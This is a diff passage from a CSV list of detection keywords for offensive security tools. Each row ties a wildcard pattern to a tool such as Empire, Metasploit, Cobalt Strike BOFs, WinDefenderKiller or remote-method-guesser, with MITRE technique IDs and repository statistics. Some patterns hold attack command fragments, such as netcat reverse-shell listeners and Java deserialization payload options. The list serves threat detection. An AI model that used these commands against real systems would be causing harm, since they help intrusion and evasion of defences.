T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" -"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" -"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","667","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z" +"*ReversingID/Shellcode-Loader*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*RevertToSelf was successful*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Revoke-Obfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. used for de obfuscating powershell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","7","668","121","2020-02-11T19:40:37Z","2017-07-11T01:20:48Z" "*RevWinDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*RhinoSecurityLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*RhinoSecurityLabs/pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*-Rhost * -Port * -Cmd *cmd /c*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*rhosts_walker_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*RiccardoAncarani/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*RiccardoAncarani/LiquidSnake*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*RiccardoAncarani/TaskShell*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*rid_hijack.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ridbrute_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ridrelay*","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","4","375","62","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z" -"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Ripemd-160.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*rkervella/CarbonMonoxide*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*rlwrap -cAr nc -lvnp *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*rlwrap nc -lvnp *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rm -f *.o dump_vdso test_payload*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" -"*rmg bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg bind *127.0.0.1:*--localhost-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg call * --plugin GenericPrint.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg call * --signature * --bound-name plain-server*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg codebase *http* --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg codebase *java.util.HashMap *--bound-name legacy-service*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg enum *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg guess * *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg listen * CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg listen 0.0.0.0 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg objid *[*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg roguejmx *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg scan *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg scan * --ports *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg serial * AnTrinh * --component *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" -"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1353","206","2023-09-27T08:30:55Z","2020-03-28T09:56:08Z" +"*rmg bind * jmxrmi --bind-objid *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 